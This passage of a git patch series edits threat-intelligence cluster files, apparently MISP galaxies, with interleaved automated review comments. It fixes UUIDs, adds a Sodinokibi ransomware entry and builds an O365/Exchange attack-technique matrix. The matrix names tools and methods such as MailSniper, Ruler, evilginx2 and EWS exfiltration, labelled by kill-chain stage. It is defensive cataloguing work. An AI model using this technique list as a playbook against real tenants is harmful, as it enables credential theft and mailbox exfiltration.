"72c37e24-4ead-11e8-8f08-db3ec8f8db86", "value": "HenBox" }, { 
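Review bot: The trailing space in `"2c75b006-2d18-11e8-8f57-2714f7737ec5 "` and the stray `§` on the HenBox UUID in the next hunk (like the Pedcont, God Crypt, sector.json, SHARPKNOT and Iron Backdoor values fixed later in this patch) are all strings a JSON Schema `pattern` on the `uuid` property would have rejected, yet they reached the repository and needed a manual sweep. If the cluster schema used by `validate_all.sh` does not already constrain it, add `"pattern": "^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$"` to that property so malformed UUIDs fail CI at commit time. Uniqueness across a file (the malpedia hunks below are all duplicate-UUID fixes) cannot be expressed in JSON Schema and needs a small script check next to the schema validation.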
@@ -4655,5 +4655,5 @@ "value": "Razdel" } ], - "version": 19 + "version": 20 } diff --git a/clusters/malpedia.json b/clusters/malpedia.json index b1d9f45..53d27c7 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -1315,7 +1315,7 @@ "synonyms": [], "type": [] }, - "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", + "uuid": "8196b6f6-386e-4499-b269-4e5c65f74141", "value": "Cpuminer (ELF)" }, { @@ -1977,7 +1977,7 @@ ], "type": [] }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "uuid": "a8404a31-968a-47e8-8434-533ceaf84c1f", "value": "X-Agent (ELF)" }, { @@ -2063,7 +2063,7 @@ "synonyms": [], "type": [] }, - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "uuid": "f7c1675f-b38a-4511-9ac4-6e475b3815e6", "value": "DualToy (iOS)" }, { @@ -2089,7 +2089,7 @@ "synonyms": [], "type": [] }, - "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "uuid": "bb340271-023c-4283-9d22-123317824a11", "value": "WireLurker (iOS)" }, { @@ -2674,7 +2674,7 @@ "synonyms": [], "type": [] }, - "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "uuid": "2bb6c494-8057-4d83-9202-fda3284deee4", "value": "Crisis (OS X)" }, { @@ -3018,7 +3018,7 @@ "synonyms": [], "type": [] }, - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "uuid": "bfbb6e5a-32dc-4842-936c-5d8497570c74", "value": "Mokes (OS X)" }, { @@ -3200,7 +3200,7 @@ "synonyms": [], "type": [] }, - "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", + "uuid": "13173d75-45f0-4183-8e18-554a5781405c", "value": "Uroburos (OS X)" }, { @@ -3230,7 +3230,7 @@ "synonyms": [], "type": [] }, - "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", + "uuid": "5aede44b-1a30-4062-bb97-ac9f4985ddb6", "value": "Winnti (OS X)" }, { @@ -3258,7 +3258,7 @@ "synonyms": [], "type": [] }, - "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "uuid": "f99ef0dc-9e96-42e0-bbfe-3616b3786629", "value": "Wirenet (OS X)" }, { 
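Review bot: Each duplicate-UUID fix in these malpedia hunks replaces the UUID on every entry that shared it, so the old value is orphaned entirely: `0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf` is replaced for X-Agent (ELF) here, for X-Agent (OS X) in the next group of hunks and for X-Agent (Windows) after that, and the same happens for DualToy (`8269e779-…`, iOS and Windows), Mokes (`6d5a5357-…`, OS X and Windows) and FlexiSpy (`4305d59a-…`, symbian and Windows). Leaving the original UUID on one variant of each family would keep existing tags resolving to a cluster value instead of to nothing; which variant was most likely tagged is a judgement call the commit message should state. If the malpedia cluster is regenerated from an upstream export (plausible given its size, to be confirmed), the fix belongs in the generator as well, otherwise the next regeneration reintroduces the duplicates.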
@@ -3273,7 +3273,7 @@ "synonyms": [], "type": [] }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "uuid": "858f4396-8bc9-4df8-9370-490bbb3b4535", "value": "X-Agent (OS X)" }, { @@ -3660,7 +3660,7 @@ "synonyms": [], "type": [] }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "uuid": "9f85f4fc-1cce-4557-b3d8-b9ef522fafb2", "value": "FlexiSpy (symbian)" }, { @@ -4708,7 +4708,7 @@ "synonyms": [], "type": [] }, - "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "uuid": "b420eb9f-d526-473c-95ab-5ab380bbec72", "value": "Bahamut (Windows)" }, { @@ -7360,7 +7360,7 @@ "synonyms": [], "type": [] }, - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "uuid": "440daef1-385d-42fd-a714-462590d4ce6b", "value": "DualToy (Windows)" }, { @@ -7675,7 +7675,7 @@ "synonyms": [], "type": [] }, - "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", + "uuid": "06450729-fe60-4348-9717-c13a487738b9", "value": "Erebus (Windows)" }, { @@ -8257,7 +8257,7 @@ "synonyms": [], "type": [] }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "uuid": "2431a1e5-4e64-454a-94c8-8a95f88d2d4a", "value": "FlexiSpy (Windows)" }, { @@ -10737,7 +10737,7 @@ "synonyms": [], "type": [] }, - "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0", "value": "Lazarus (Windows)" }, { @@ -11682,7 +11682,7 @@ "synonyms": [], "type": [] }, - "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "uuid": "2edd3051-b1b5-47f2-9155-8c97f791dfb7", "value": "Mirai (Windows)" }, { @@ -11805,7 +11805,7 @@ "synonyms": [], "type": [] }, - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "uuid": "3a711d44-2a70-418d-92c1-692c3d3b13c2", "value": "Mokes (Windows)" }, { @@ -14395,7 +14395,7 @@ ], "type": [] }, - "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", + "uuid": "96bf1b6d-28e1-4dd9-aabe-23050138bc39", "value": "Retefe (Windows)" }, { 
@@ -18304,7 +18304,7 @@ ], "type": [] }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "uuid": "e8b38fbd-a7ce-4073-a660-44dfabc1b678", "value": "X-Agent (Windows)" }, { @@ -18799,5 +18799,5 @@ "value": "Zyklon" } ], - "version": 2559 + "version": 2560 } diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 157cf4c..558bc6a 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -11863,7 +11863,7 @@ "http://id-ransomware.blogspot.com/2018/06/pedcont-ransomware.html" ] }, - "uuid": "b0e074fc-6e45-11e8-8366-dbfc88552a23 ", + "uuid": "b0e074fc-6e45-11e8-8366-dbfc88552a23", "value": "Pedcont" }, { @@ -12539,7 +12539,7 @@ "Ransomware God Crypt" ] }, - "uuid": "7074f228-e0ee-11e8-9c49-7fc798e92ddbx§", + "uuid": "1b74bfda-c32c-4713-8ff6-793d8e787645", "value": "God Crypt Joke Ransomware" }, { @@ -13141,5 +13141,5 @@ "value": "Cr1ptT0r" } ], - "version": 60 + "version": 61 } diff --git a/clusters/sector.json b/clusters/sector.json index 1248a6c..993867e 100644 --- a/clusters/sector.json +++ b/clusters/sector.json @@ -7,7 +7,7 @@ "name": "Sector", "source": "CERT-EU", "type": "sector", - "uuid": "141deecc-ae4e-11e7-8dfe-f3397ba8cc8", + "uuid": "1401c704-7dfb-41f6-a6d3-e751b270843b", "values": [ { "uuid": "3ff4e243-7e26-4535-b911-fdda2f724aa2", @@ -478,5 +478,5 @@ "value": "Immigration" } ], - "version": 3 + "version": 4 } diff --git a/clusters/tool.json b/clusters/tool.json index b15a64f..bbf8b5c 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -6469,7 +6469,7 @@ "type": "similar" } ], - "uuid": "3784c74-691a-4110-94f6-66e60224aa92", + "uuid": "203fd529-6382-417e-a68f-7565fbf89ece", "value": "SHARPKNOT" }, { @@ -6682,7 +6682,7 @@ "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" ] }, - "uuid": "1740ec4-d730-40d6-a3b8-32d5fe7f21cf", + "uuid": "5433edec-f1c3-4051-a3cc-c7f9fc8972ee", "value": "Iron Backdoor" }, { @@ -7683,5 +7683,5 @@ "value": "Scranos" } ], - "version": 120 + "version": 121 } 
From 5bbb0ab53d4c2b97d63bcad479bb7cdcd55b59c2 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Wed, 8 May 2019 15:54:37 +0200 Subject: [PATCH 34/50] add Sodinokibi --- clusters/ransomware.json | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 558bc6a..345a723 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -13139,7 +13139,17 @@ }, "uuid": "8cfa554a-1e1b-328a-606f-026d771870b1", "value": "Cr1ptT0r" + }, + { + "description": "Attackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called \"Sodinokibi.\" Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco's Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html" + ] + }, + "uuid": "24bd9a4b-2b66-428b-8e1c-6b280b056c00", + "value": "Sodinokibi" } ], - "version": 61 + "version": 62 } From 7c0ea4949a4f8dd6f83d0ceeef0650c9297aa50f Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Sun, 12 May 2019 11:11:09 +0530 Subject: [PATCH 35/50] Update threat-actor.json --- clusters/threat-actor.json | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 25e623b..99b0e6f 100644 --- a/clusters/threat-actor.json 
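Review bot: The new description is a verbatim paragraph from the referenced Talos post, so it carries first-person vendor statements ("Cisco's Incident Response (IR) team, along with Cisco Talos, are actively investigating") and year-less relative dates ("April 26", "April 17") that will read as stale in a shared galaxy. A neutral summary keeps the facts the entry needs: `"description": "Sodinokibi is a ransomware family first observed in April 2019, deployed by exploiting the Oracle WebLogic vulnerability CVE-2019-2725 (patched out of cycle on 2019-04-26); it encrypts files in the user's directory and deletes shadow copies to hinder recovery."` The entry also carries none of the structured meta fields other ransomware entries in this file use (`encryption`, `payment-method`, `price`, `ransomnotes` are visible in the later rework hunks); if the source gives them, they belong in `meta` rather than in prose.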
+++ b/clusters/threat-actor.json @@ -1709,13 +1709,12 @@ "refs": [ "https://en.wikipedia.org/wiki/Operation_Newscaster", "https://iranthreats.github.io/resources/macdownloader-macos-malware/", - "https://www.isightpartners.com/2014/05/newscaster-iranian-threat-inside-social-media/", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks/file-2581720763-pdf.pdf", "https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/", "https://cryptome.org/2012/11/parastoo-hacks-iaea.htm", "https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf", "https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/", "https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf", - "https://github.com/gasgas4/APT_CyberCriminal_Campagin/tree/master/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks", "https://www.cfr.org/interactive/cyber-operations/newscaster" ], "synonyms": [ From a2df5c46d8452ad295e257e38f59777052878933 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 09:51:41 +0200 Subject: [PATCH 36/50] chg: [o365-exchange-techniques] [WiP] based on John Lambert matrix techniques --- clusters/o365-exchange-techniques.json | 115 +++++++++++++++++++++++++ galaxies/o365-exchange-techniques.json | 18 ++++ 2 files changed, 133 insertions(+) create mode 100644 clusters/o365-exchange-techniques.json create mode 100644 galaxies/o365-exchange-techniques.json diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json new file mode 100644 index 0000000..a79baa8 --- /dev/null +++ b/clusters/o365-exchange-techniques.json 
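Review bot: After this hunk the NewsCaster entry no longer cites the primary publisher at all: the iSIGHT Partners URL is replaced by a PDF re-hosted on paper.seebug.org, and the removed GitHub line was itself a mirror of the same report. If the vendor URL is dead, keeping it next to an archived copy (`https://web.archive.org/web/*/https://www.isightpartners.com/2014/05/newscaster-iranian-threat-inside-social-media/`) preserves provenance better than a third-party mirror alone, and the commit message ("Update threat-actor.json") should say why the reference was swapped. The entry's `value` and `uuid` lie outside this hunk.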
@@ -0,0 +1,115 @@ +{ + "authors": [ + "John Lambert", + "Alexandre Dulaunoy" + ], + "category": "guidelines", + "description": "o365-exchange-techniques - Office365/Exchange related techniques by @johnLaT", + "name": "o365-exchange-techniques", + "source": "Open Sources", + "type": "cloud-security", + "uuid": "44574c7e-b732-4466-a7be-ef363374013a", + "values": [ + { + "description": "AAD - Dump users and groups with Azure AD", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "fab70361-329a-410a-9dc4-831ecd8df39f", + "value": "AAD - Dump users and groups with Azure AD" + }, + { + "description": "O365 - Get Global Address List: MailSniper", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "21833216-1b8a-43a9-b51e-500c67a900a8", + "value": "O365 - Get Global Address List: MailSniper" + }, + { + "description": "O365 - Find Open Mailboxes: MailSniper", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "9e3af2e1-90a6-4d69-ba82-cb0c99401713", + "value": "O365 - Find Open Mailboxes: MailSniper" + }, + { + "description": "O365 - User account enumeration with ActiveSync", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "53361eef-39b0-4c46-a009-0b4e3a0e286a", + "value": "O365 - User account enumeration with ActiveSync" + }, + { + "description": "End Point - Search host for Azure Credentials: SharpCloud", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "5c0c2b04-77e5-4f50-a0b8-206d7cc9946a", + "value": "End Point - Search host for Azure Credentials: SharpCloud" + }, + { + "description": "On-Prem Exchange - Portal Recon", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "2cd547bf-b093-4dab-b9e5-5172049cbc0d", + "value": "On-Prem Exchange - Portal Recon" + }, + { + "description": "On-Prem Exchange - Enumerate domain accounts: using Skype4B", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "651fdde4-09ed-48b7-9620-545d7dcec251", + "value": "On-Prem 
Exchange - Enumerate domain accounts: using Skype4B" + }, + { + "description": "On-Prem Exchange - Enumerate domain accounts: OWA & Exchange", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "008c46de-4667-4e40-9bea-74e91b6587fd", + "value": "On-Prem Exchange - Enumerate domain accounts: OWA & Exchange" + }, + { + "description": "On-Prem Exchange - Enumerate domain accounts: FindPeople", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "435e9319-88ed-4555-be84-a5322dc997a4", + "value": "On-Prem Exchange - Enumerate domain accounts: FindPeople" + }, + { + "description": "On-Prem Exchange - OWA version discovery", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "f227caf6-9399-4ac3-bab4-010f66853abb", + "value": "On-Prem Exchange - OWA version discovery" + } + ], + "version": 1 +} diff --git a/galaxies/o365-exchange-techniques.json b/galaxies/o365-exchange-techniques.json new file mode 100644 index 0000000..204adf6 --- /dev/null +++ b/galaxies/o365-exchange-techniques.json @@ -0,0 +1,18 @@ +{ + "description": "o365-exchange-techniques - Office365/Exchange related techniques by @johnLaTwC", + "icon": "map", + "kill_chain_order": { + "tactics": [ + "Recon", + "Compromise", + "Persistence", + "Expansion", + "Actions on Intent" + ] + }, + "name": "o365-exchange-techniques", + "namespace": "misp", + "type": "cloud-security", + "uuid": "44574c7e-b732-4466-a7be-ef363374013a", + "version": 1 +} From 3a75c6a3dffa71903a84919edce6cc931a3c0ac4 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 12:07:30 +0200 Subject: [PATCH 37/50] chg: [o365-exchange-techniques] Compromise row added (WiP) --- clusters/o365-exchange-techniques.json | 80 ++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json index a79baa8..5dbe500 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json 
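Review bot: The cluster `description` ends in `@johnLaT` while the galaxy file created in the same commit says `@johnLaTwC`; one of the two is truncated and they should agree. `"type": "cloud-security"` also departs from the convention every other cluster on this page follows, where type equals the file name (`"type": "sector"` in clusters/sector.json, `"type": "threat-actor"` in clusters/threat-actor.json); since MISP appears to pair galaxy and cluster files by type, either rename the files or set `"type": "o365-exchange-techniques"` in both. Every value repeats its `value` string as `description`, carries no `refs`, and the top-level `"source": "Open Sources"` does not say where the matrix was published, so a `refs` array on each value (`"refs": ["<URL of the Lambert matrix>"]`) or at least a concrete `source` URL would make the entries checkable; the commit title's "[WiP]" suggests this may be intended, but the first version is the one consumers will import.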
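Review bot: The `kill_chain_order` tactics are capitalised phrases with spaces ("Actions on Intent") whereas the MITRE galaxy later in this series uses lowercase hyphenated identifiers ("command-and-control"); because these strings become tag components (`tactics:Actions on Intent` appears in the cluster), a slug form such as `actions-on-intent` is safer for tag handling and consistent with the repository's other galaxy. Either form works technically, but it is much easier to settle before events are tagged with it.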
@@ -109,6 +109,86 @@ }, "uuid": "f227caf6-9399-4ac3-bab4-010f66853abb", "value": "On-Prem Exchange - OWA version discovery" + }, + { + "description": "AAD - Password Spray: MailSniper", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "933ec08d-a6d4-4ced-b732-4cb0331e7799", + "value": "AAD - Password Spray: MailSniper" + }, + { + "description": "AAD - Password Spray: CredKing", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "5670ca90-38cd-4825-bd83-1bdb31fd5ea3", + "value": "AAD - Password Spray: CredKing" + }, + { + "description": "O365 - Bruteforce of Autodiscover: SensePost Ruler", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "d66c1ead-4dd3-4968-b6fe-faf41b7fb88d", + "value": "O365 - Bruteforce of Autodiscover: SensePost Ruler" + }, + { + "description": "O365 - Phishing for credentials", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "eda57f15-029c-4465-9401-f9dafc6d366c", + "value": "O365 - Phishing for credentials" + }, + { + "description": "O365 - Phishing using OAuth app", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "61589df6-6848-4866-8613-8a4a7478abef", + "value": "O365 - Phishing using OAuth app" + }, + { + "description": "O365 - 2FA MITM Phishing: evilginx2", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "fa1087c8-012d-4ef6-9eb3-5b5a6fb94c02", + "value": "O365 - 2FA MITM Phishing: evilginx2" + }, + { + "description": "On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "8ffe80b9-0213-40c6-aeca-8877bdca8741", + "value": "On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS" + }, + { + "description": "On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "cf8df948-0332-4ec7-94f3-3f6d54bbcbb9", + "value": "On-Prem 
Exchange - Bruteforce of Autodiscover: SensePost Ruler" } ], "version": 1 From ee0f793e49912c61f32cf8fb5d13eb6fbaf19307 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 17:54:53 +0200 Subject: [PATCH 38/50] chg: [o365-exchange-techniques] Persistence kill-chain added (WiP) --- clusters/o365-exchange-techniques.json | 60 ++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json index 5dbe500..fdcd02e 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json 
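Review bot: `"version": 1` is left unchanged in the trailing context although eight values are added, and the Persistence, Expansion and Actions-on-Intent hunks of the following three commits do the same; only the later "fix: o365-exchange-techniques" commit bumps it to 2. Every other content change on this page bumps the cluster `version` in the same commit (19→20, 61→62, 109→110), and consumers that already imported version 1 will presumably not pick up new values until it changes, so the bump belongs with the content. The new value UUIDs (`933ec08d-…` through `cf8df948-…`) should also be checked for uniqueness against the rest of the file, which is exactly what the later fix commit had to do for the Persistence row.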
@@ -189,6 +189,66 @@ }, "uuid": "cf8df948-0332-4ec7-94f3-3f6d54bbcbb9", "value": "On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler" + }, + { + "description": "O365 - Add Mail forwarding rule", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "80308e39-11e9-45b2-b6d2-f13f3de509ab", + "value": "O365 - Add Mail forwarding rule" + }, + { + "description": "O365 - Add Global admin account", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "a9c1f718-b9bf-4efc-9fa1-852b6c93f725", + "value": "O365 - Add Global admin account" + }, + { + "description": "O365 - Delegate Tenant Admin", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "80308e39-11e9-45b2-b6d2-f13f3de509ab", + "value": "O365 - Delegate Tenant Admin" + }, + { + "description": "End Point - Persistence throught Outlook Home Page: SensePost Ruler", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "708790c8-3e6f-4dd3-8f89-0651ef71dfe0", + "value": "End Point - Persistence throught Outlook Home Page: SensePost Ruler" + }, + { + "description": "End Point - Persistence throught custom Outlook form", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "aadc2552-97db-419c-a414-5c1f862d38ef", + "value": "End Point - Persistence throught custom Outlook form" + }, + { + "description": "End Point - Create Hidden Mailbox Rule", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "d023f254-466b-436b-acfd-beea54c323b1", + "value": "End Point - Create Hidden Mailbox Rule" } ], "version": 1 From 5d1565152cb88dfba911f310bb384552f64aa311 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 18:19:00 +0200 Subject: [PATCH 39/50] chg: [o365-exchange-techniques] Expansion added (WiP) --- clusters/o365-exchange-techniques.json | 80 ++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) 
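Review bot: "throught" is misspelled in both the `description` and `value` of the two End Point persistence entries (`"End Point - Persistence throught Outlook Home Page: SensePost Ruler"` and `"End Point - Persistence throught custom Outlook form"`); since `value` becomes the tag name, fix it to "through" before anyone tags events with it, as renaming later means carrying a synonym. The `80308e39-…` UUID reused for "Delegate Tenant Admin" is corrected in a later commit of this series, so only the spelling remains open here.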
diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json
index fdcd02e..2f9816f 100644
--- a/clusters/o365-exchange-techniques.json
+++ b/clusters/o365-exchange-techniques.json
@@ -249,6 +249,86 @@ }, "uuid": "d023f254-466b-436b-acfd-beea54c323b1", "value": "End Point - Create Hidden Mailbox Rule" + }, + { + "description": "O365 - MailSniper: Search Mailbox for credentials", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "fccf7c5a-7d2c-413b-ae45-d5ab226c8ba8", + "value": "O365 - MailSniper: Search Mailbox for credentials" + }, + { + "description": "O365 - Search for Content with eDiscovery", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "fe65c7ed-7129-4591-a82e-a223b0cdbf14", + "value": "O365 - Search for Content with eDiscovery" + }, + { + "description": "O365 - Account Takeover: Add-MailboxPermission", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "19f22ecb-8470-4f69-a763-46a19afe6c5d", + "value": "O365 - Account Takeover: Add-MailboxPermission" + }, + { + "description": "O365 - Pivot to On-Prem host: SensePost Ruler", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "c0010a9d-666e-4cfd-a9b3-21f5861ecdf6", + "value": "O365 - Pivot to On-Prem host: SensePost Ruler" + }, + { + "description": "O365 - Exchange Tasks for C2: MWR", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "9ada2a83-c632-4c9c-91cd-b1d7b947e44a", + "value": "O365 - Exchange Tasks for C2: MWR" + }, + { + "description": "O365 - Send Internal Email", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "685af033-af7b-4582-a539-5f1f9080fd98", + "value": "O365 - Send Internal Email" + }, + { + "description": "On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "0f33ff1e-2305-4239-8d30-38edcfe2511a", + "value": "On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)" + }, + { + "description": "On-Prem Exchange - Delegation", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + 
"uuid": "a69da576-7ed2-4b29-8c4a-6c16bd2c2a54", + "value": "On-Prem Exchange - Delegation" } ], "version": 1 From 678b2a56219906b17a40b84b4c5ab6bc4c262a72 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 18:25:01 +0200 Subject: [PATCH 40/50] chg: [o365-exchange-techniques] Actions on Intent added (finalized) --- clusters/o365-exchange-techniques.json | 40 ++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json index 2f9816f..782dd9f 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json @@ -329,6 +329,46 @@ }, "uuid": "a69da576-7ed2-4b29-8c4a-6c16bd2c2a54", "value": "On-Prem Exchange - Delegation" + }, + { + "description": "O365 - MailSniper: Search Mailbox for content", + "meta": { + "kill_chain": [ + "tactics:Actions on Intent" + ] + }, + "uuid": "ae6eb93b-503f-49b5-98db-3f282551facb", + "value": "O365 - MailSniper: Search Mailbox for content" + }, + { + "description": "O365 - Search for Content with eDiscovery", + "meta": { + "kill_chain": [ + "tactics:Actions on Intent" + ] + }, + "uuid": "8ac66795-5e59-4993-973b-b6efd78fb1c8", + "value": "O365 - Search for Content with eDiscovery" + }, + { + "description": "O365 - Exfiltration email using EWS APIs with PowerShell", + "meta": { + "kill_chain": [ + "tactics:Actions on Intent" + ] + }, + "uuid": "4d67a417-169c-47d0-a7fa-d710b9e2f611", + "value": "O365 - Exfiltration email using EWS APIs with PowerShell" + }, + { + "description": "O365 - Download documents and email", + "meta": { + "kill_chain": [ + "tactics:Actions on Intent" + ] + }, + "uuid": "1ccc00f8-d4b5-4c72-a7c0-a53127497a7c", + "value": "O365 - Download documents and email" } ], "version": 1 From 9ad5279939670b5c79ab5b6044e7b60805d37112 Mon Sep 17 00:00:00 2001 
From: mokaddem Date: Mon, 13 May 2019 10:59:30 +0200 Subject: [PATCH 41/50] chg: [attack-pattern] Sync kill-chain with data from MITRE. --- galaxies/mitre-attack-pattern.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/galaxies/mitre-attack-pattern.json b/galaxies/mitre-attack-pattern.json index 17eebea..930ce96 100644 --- a/galaxies/mitre-attack-pattern.json +++ b/galaxies/mitre-attack-pattern.json @@ -12,8 +12,9 @@ "discovery", "lateral-movement", "collection", + "command-and-control", "exfiltration", - "command-and-control" + "impact" ], "mitre-mobile-attack": [ "initial-access", @@ -26,6 +27,7 @@ "effects", "collection", "exfiltration", + "command-and-control", "network-effects", "remote-service-effects" ], @@ -51,5 +53,5 @@ "namespace": "mitre-attack", "type": "mitre-attack-pattern", "uuid": "c4e851fa-775f-11e7-8163-b774922098cd", - "version": 7 + "version": 8 } From 59869bf145b82f94c420c6c154e87bb3689a16b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rapha=C3=ABl=20Vinot?= Date: Mon, 13 May 2019 11:15:38 +0200 Subject: [PATCH 42/50] fix: o365-exchange-techniques (duplicate values, duplicate UUIDs) --- clusters/o365-exchange-techniques.json | 17 ++++------------- 1 file changed, 4 insertions(+), 13 deletions(-) diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json index 782dd9f..1fc14b6 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json @@ -217,7 +217,7 @@ "tactics:Persistence" ] }, - "uuid": "80308e39-11e9-45b2-b6d2-f13f3de509ab", + "uuid": "2f10dbd7-89e4-4929-8bdc-8ca167f08ace", "value": "O365 - Delegate Tenant Admin" }, { @@ -264,7 +264,8 @@ "description": "O365 - Search for Content with eDiscovery", "meta": { "kill_chain": [ - "tactics:Expansion" + 